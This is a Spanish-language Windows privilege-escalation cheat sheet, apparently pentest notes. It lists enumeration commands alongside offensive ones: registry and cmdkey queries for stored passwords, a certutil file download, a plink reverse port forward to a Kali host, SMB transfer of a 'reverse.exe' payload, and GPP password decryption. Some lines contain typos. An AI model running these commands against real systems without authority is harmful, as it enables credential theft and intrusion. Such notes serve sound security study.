Windows Basics
Enumeración
Enumeración del sistema
systeminfo
systeminfo | findstr /B /C: "OS Name" /C: "OS Version" /C: "System Type"
wmic qfe get Caption, Description, HotFixID, InstalledOn #Muestra actualizaciones del sistema
wmic logicaldisk get caption, description, providername #Muestra discosEnumeración de usuarios
whoami
whoami /priv
whoami /groups
net user
net user <USUARIO>
net localgroup
net localgroup <GRUPO>Enumeración de red
ip a
ifconfig
route
ip route
aipconfig
ipconfig /all #Información extendida
arp -a
route print
netstat -anoBúsqueda de archivos
#CMD
where /r c:\ file.txt
#Powershell
Get-ChildItem -Path C:\Myfolder -Filter file.txt -RecursBúsqueda de credenciales
#Valores en el registro que contengan la string “password”
reg query HKLM /f password /t REG_SZ /s
#Listar autologon passwords
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
#Lista contraseñas guardadas
cmdkey /list
Enumeración de antivirus
sc query windefend
sc queryex type= service #Lista servicios activos
netsh advfirewall firewall dumpEnumeración con herramientas automáticas
Funciones básicas
Descarga de archivos
certutil.exe -urlcache -f <URL> <OUTPUT_FILE>Comprobación de permisos sobre un archivo
accesschk.exe /accepteula -quvw <user> <Ruta absoluta del archivo>Ejecución de un programa como otro usuario en Powershell
powershell -c "$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('<USER>', $password);Start-Process -FilePath "<PROGRAM.EXE>" -Credential $creds"Windows Port Forwarding
plink.exe -l <KALI_USER> -pw <KALI_USER_PASS> -R <KALI_PORT>:<LOCAL_IP/LOCALHOST_IP>:<LOCAL_PORT> <KALI_IP>Transferencia de archivos mediante smb
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . #Kali
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe #WindowsDesencriptado GPP
gpp-decrypt "<hash>"Última actualización